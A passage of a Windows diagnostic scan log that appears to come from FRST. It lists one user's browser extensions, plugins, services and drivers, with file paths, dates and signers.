FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\@flash_debugger.xpi [2019-07-14]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\sp@avast.com.xpi [2019-01-23]
FF Extension: (Avast Online Security) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\wrc@avast.com.xpi [2018-07-17]
FF Extension: (Video DownloadHelper) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2018-07-22]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default [2019-07-14]
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default\Extensions\@flash_debugger.xpi [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\39pruj5d.default [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\ly01ikd2.default-release [2023-07-30]
FF NetworkProxy: Mozilla\Firefox\Profiles\ly01ikd2.default-release -> backup.ftp", "89.221.223.204"
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\5fn2593k.default [2021-06-06]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default [2021-06-09]
FF NetworkProxy: Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default -> ftp", "127.0.0.1"
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default\Extensions\@flash_debugger [2017-04-12] [Legacy]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2023-03-08] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin: @java.com/DTPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\dtplugin\npDeployJava1.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\plugin2\npjp2.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=3 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=9 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
StartMenuInternet: Firefox-CA9422711AE1A81C - C:\Program Files\Firefox Developer Edition\firefox.exe

Chrome:
=======
CHR Profile: C:\Users\John\AppData\Local\Google\Chrome\User Data\Default [2023-11-24]
CHR Extension: (Ban Checker for Steam) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\canbadmphamemnmdfngmcabnjmjgaiki [2023-10-12]
CHR Extension: (CSS Used) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cdopjfddjlonogibjahpnmjpoangjfff [2023-04-17]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2023-11-12]
CHR Extension: (Steam Inventory Helper) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmeakgjggjdlcpncigglobpjbkabhmjl [2023-11-22]
CHR Extension: (Avast Online Security & Privacy (BETA)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\daanglpcpkjjlkhcbladppjphglbigam [2023-01-19]
CHR Extension: (BuiltWith Technology Profiler) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dapjbgnjinbpoindlpdmhochffioedbn [2022-05-12]
CHR Extension: (Slither.io Skins, Mods, Hack & Guide) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dggomkijbihggjgcgdbnleolpleddaid [2016-06-12]
CHR Extension: (Session Buddy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\edacconmaakjimmfgnblocblbcdcpbko [2023-11-12]
CHR Extension: (Zotero Connector) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekhagklcjbdpajgpjgmbionohlpdbjgc [2023-10-02]
CHR Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2023-04-30]
CHR Extension: (DarkOrbit SID Login) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fgkcmijdllamjcbfeeheebbphpnbmbco [2019-07-01]
CHR Extension: (Video Downloader PLUS) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhplmmllnpjjlncfjpbbpjadoeijkogc [2020-09-29]
CHR Extension: (Word Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fiombgjlkfpdpkbhfioofeeinbehmajg [2021-05-13]
CHR Extension: (Bad Connection Simulator) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gflankmgolakfdeiponkgmbhbhpdmjlg [2023-10-17]
CHR Extension: (Google Docs Offline) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2023-06-01]
CHR Extension: (Avast Online Security & Privacy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2023-01-17]
CHR Extension: (Multi Session Box - Multi login any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\hojmmbfmaddjdkkcgbiipkphdcfmkhge [2021-09-04]
CHR Extension: (Stream Video Downloader) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-14]
CHR Extension: (Unseen for Facebook) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jiomcgpfgkeefipihnplhadgdoollmap [2021-01-08]
CHR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2023-07-30]
CHR Extension: (Chromebook Recovery Utility) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jndclpdbaamdhonoechobihbbiimdgai [2022-06-02]
CHR Extension: (Application Launcher For Drive (by Google)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2023-01-26]
CHR Extension: (WebChatGPT: ChatGPT with internet access) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfemeioodjbpieminkklglpmhlngfcn [2023-11-24]
CHR Extension: (PowerPoint Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdafamggmaaaginooondinjgkgcbpnhp [2020-03-24]
CHR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-19]
CHR Extension: (Twitch Now) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlmbdmpjmlijibeockamioakdpmhjnpk [2021-06-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Font Changer) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\obgkjikcnonokgaiablbenkgjcdbknna [2023-06-06]
CHR Extension: (Proxy SwitchyOmega) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\padekgcemlokbadohgkifijomclgjgif [2020-12-20]
CHR Extension: (Cold Turkey Blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\pganeibhckoanndahmnfggfoeofncnii [2023-11-17]
CHR HKU\S-1-5-21-949114339-2066100574-2594248327-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [daanglpcpkjjlkhcbladppjphglbigam]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2012-09-23]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]

Opera:
=======
OPR Profile: C:\Users\John\AppData\Roaming\Opera Software\Opera Stable [2023-11-25]
OPR DownloadDir: I:\stahovanie
OPR Notifications: Opera Stable -> hxxps://aternos.org; hxxps://forum24.os.tc; hxxps://mail.google.com; hxxps://meet.google.com; hxxps://opencsgo.com; hxxps://skinodds.com; hxxps://www.pvpro.com; hxxps://www.tipsport.sk
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=o ... utEncoding}
OPR Extension: (Custom Page Zoom) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\acfbkfekhjlboehfjgdidogogpbklcdm [2023-08-18]
OPR Extension: (AdNauseam) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\dklmdhmkdbinnceekhecifmjhiiabolp [2023-10-31]
OPR Extension: (Rich Hints Agent) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2023-10-17]
OPR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gjpihpkhgfngnbhhfdehlcmgfahbciip [2022-07-26]
OPR Extension: (Opera Wallet) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gojhcdgcpbpfigcaejpfhfegekdgiblk [2023-11-10]
OPR Extension: (Twitch Now) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hiahmjdojdodmjjhhddegdnhcpjmokmo [2021-06-20]
OPR Extension: (Scripter) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hpochgedhgonjnpbepkbnkkibkjigknc [2021-09-08]
OPR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2021-11-03]
OPR Extension: (Deezer™ Downloader (Deezloader)) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jnmflndddcmkajmkoahaenmnfbdckaom [2022-02-28]
OPR Extension: (Amazon Assistant Promotion) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2021-08-14]
OPR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-20]
StartMenuInternet: (HKLM) Opera GXStable - C:\Program Files\Opera GX\Launcher.exe

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [173040 2022-09-26] (Adobe Inc. -> Adobe Inc.)
S4 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [818128 2018-04-24] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
S4 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2321384 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2128872 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S2 apacheds-default; C:\Program Files (x86)\ApacheDS\bin\wrapper.exe [204800 2020-02-28] () [File not signed]
S4 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [8477080 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [621728 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Tools; C:\Program Files\AVAST Software\Avast\aswToolsSvc.exe [351848 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avastm; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 AvastSecureBrowserElevationService; C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\elevation_service.exe [1136920 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-05-17] (BattlEye Innovations e.K. -> )
S4 CDROM_Detect; C:\Program Files\4G LTE Modem\4G_Server.exe [327680 2016-11-19] () [File not signed]
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2776664 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1467072 2016-05-30] (Disc Soft Ltd -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1135648 2022-04-16] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-10-06] (Epic Games Inc. -> Epic Games, Inc.)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [206304 2021-03-31] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 ewserver; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe [191664 2018-02-26] (Trace Software International -> )
S4 FACEITService; C:\Program Files\FACEIT AC\FACEITService.exe [20756320 2020-05-01] (FACE IT LIMITED -> )
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [82216 2021-02-17] (Mixbyte Inc -> Freemake)
R2 Hamachi2Svc; C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe [3361736 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S4 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-09-19] (Hi-Rez Studios) [File not signed]
S4 impi_hydra; C:\Program Files\Common Files\SolidWorks Shared\Simulation Worker Agent\hydra_service.exe [880296 2018-02-26] (Intel(R) Software Development Products -> Intel Corporation)
S4 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe [419248 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S4 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193656 2016-03-30] (Logitech Inc -> Logitech Inc.)
S2 MBAMService; I:\windows programy\malware bytes\MBAMService.exe [9343840 2023-11-23] (Malwarebytes Inc. -> Malwarebytes)
S4 memcached; c:\memcached\memcached.exe [507640 2009-12-16] () [File not signed]
S4 MSSQL$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\sqlservr.exe [372416 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
S4 ProtonVPN Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPNService.exe [100672 2020-04-17] (ProtonVPN AG -> )
S4 ProtonVPN Update Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.UpdateService.exe [61760 2020-04-17] (ProtonVPN AG -> )
S4 QMEmulatorService; D:\Program Files\TxGameAssistant\AppMarket\QMEmulatorService.exe [166384 2019-12-20] (Tencent Technology(Shenzhen) Company Limited -> Tencent)
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] (Razer USA Ltd. -> )
R2 RemoteSolverDispatcher; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe [264704 2018-02-26] (Mentor Graphics Corporation -> Mentor Graphics Corporation)
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2017072 2022-02-02] (Rockstar Games, Inc. -> Rockstar Games) [File not signed]
R2 SbieSvc; D:\windows programy\Sandboxie-Plus\SbieSvc.exe [363992 2022-08-29] (Tonalio GmbH -> Sandboxie-Plus.com)
R2 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2018-05-27] (SolidWorks) [File not signed]
S4 SQLAgent$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [613056 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R2 Synology Drive VSS Service x64; C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe [370824 2022-03-29] (Synology Inc. -> )
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [18035512 2023-10-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 ucldr_battlegrounds_gl; C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe [7099632 2021-07-21] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S4 uncheater_bgl; C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe [2097008 2020-11-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S2 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [746504 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R2 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10430256 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [15477208 2020-03-07] (VMware, Inc. -> )
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [56552 2016-03-22] (Microsoft Corporation -> Microsoft Corporation)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [147392 2019-04-30] (Microsoft Corporation -> Microsoft Corporation)
S4 wampapache64; c:\wamp64\bin\apache\apache2.4.33\bin\httpd.exe [30720 2018-03-18] (Apache Software Foundation) [File not signed]
S4 wampmariadb64; c:\wamp64\bin\mariadb\mariadb10.2.14\bin\mysqld.exe [14550440 2018-03-26] (MariaDB Corporation Ab -> )
S4 wampmysqld64; c:\wamp64\bin\mysql\mysql5.7.21\bin\mysqld.exe [39551488 2017-12-28] () [File not signed]
R2 WebDriveService; C:\Program Files\WebDrive\wdService.exe [12388232 2019-12-20] (South River Technologies -> South River Technologies, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [7531208 2021-08-01] (PUBG CORPORATION -> PUBG Corporation)
S2 IpOverUsbSvc; "C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe" [X]
S2 SWVisualize2018.BoostService; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize Boost\SWVisualize.BoostService.exe" [X]
S2 SWVisualize2018.Queue.Server; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 amdkmdap; C:\Windows\System32\Drivers\amdkmdap.sys [614280 2020-11-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 asmthub3; C:\Windows\System32\DRIVERS\asmthub3.sys [140032 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R3 asmtxhci; C:\Windows\System32\DRIVERS\asmtxhci.sys [424192 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [36792 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [208672 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [332880 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [247888 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [97360 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42424 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [176384 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswNetHub; C:\Windows\System32\drivers\aswNetHub.sys [522480 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R3 aswNetNd6; C:\Windows\System32\DRIVERS\aswNetNd6.sys [38152 2020-04-15] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [108928 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [84496 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [851256 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [469472 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [216984 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [326064 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [58368 2009-06-02] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
S3 CMUAC; C:\Windows\System32\DRIVERS\Headset6400x1.SYS [386560 2013-10-03] (C-MEDIA ELECTRONICS INC. -> A4Tech Inc.)
S3 CT_QUALCOMM_U_drv; C:\Windows\System32\DRIVERS\CT_QUALCOMM_U_drv.sys [118016 2009-04-27] (Microsoft Windows Hardware Compatibility Publisher -> QUALCOMM Incorporated)
R3 DroidCam; C:\Windows\System32\DRIVERS\droidcam.sys [31576 2020-04-24] (DEV47 APPS -> Dev47Apps)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 EuMusDesignVirtualAudioCableWdm; C:\Windows\System32\DRIVERS\vrtaucbl.sys [66728 2016-07-05] (NTONYX Ltd. -> Eugene V. Muzychenko)
R0 FACEIT; C:\Windows\System32\Drivers\FACEIT.sys [20193656 2020-05-01] (FACE IT LIMITED -> )
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [32384 2018-05-03] (Sony Mobile Communications AB -> Sony Mobile Communications)
R1 gvm; C:\Windows\System32\DRIVERS\gvm.sys [393712 2020-09-22] (Google LLC -> Google LLC)
S3 HidNt; C:\Windows\System32\DRIVERS\HIDNt.sys [22576 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
S3 HidNt; C:\Windows\SysWOW64\DRIVERS\HIDNt.sys [18992 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
S3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 KProcessHacker3; C:\Program Files\Process Hacker 2\kprocesshacker.sys [45208 2016-03-29] (Wen Jia Liu -> wj32)
R2 LdBoxDrv; C:\Program Files\dnplayerext2\LdBoxDrv.sys [319376 2020-06-18] (Shanghai Changzhi Network Technology Co., Ltd. -> Oracle Corporation)
R3 LGBusEnum; C:\Windows\System32\drivers\LGBusEnum.sys [37408 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 LGVirHid; C:\Windows\System32\drivers\LGVirHid.sys [26912 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 libusbK; C:\Windows\System32\DRIVERS\libusbK.sys [47200 2018-07-23] (Travis Lee Robinson -> hxxp://libusb-win32.sourceforge.net)
R3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv.sys [42016 2013-11-27] (Visicom Media Inc. -> Visicom Media Inc.)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [239544 2023-11-23] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [35232 2013-12-06] (Visicom Media Inc. -> Visicom Media Inc.)
S3 navagio; C:\Program Files\Common Files\PUBG\navagio.sys [3632840 2021-08-03] (PUBG CORPORATION -> )
R1 npcap; C:\Windows\System32\DRIVERS\npcap.sys [69432 2019-09-04] (Insecure.Com LLC -> Insecure.Com LLC.)
S3 ProtonVPNSplitTunnel; C:\Program Files (x86)\Proton Technologies\ProtonVPN\x64\Win7\ProtonVPN.SplitTunnelDriver.sys [22456 2020-01-15] (ProtonVPN AG -> Proton Technologies AG)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-06-22] (Corel Corporation -> Corel Corporation)
S4 RsFx0310; C:\Windows\System32\DRIVERS\RsFx0310.sys [249024 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [7947096 2019-05-08] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation)
R3 rzendpt; C:\Windows\System32\DRIVERS\rzendpt.sys [51224 2016-05-12] (Razer USA Ltd. -> Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer Inc. -> Razer, Inc.)
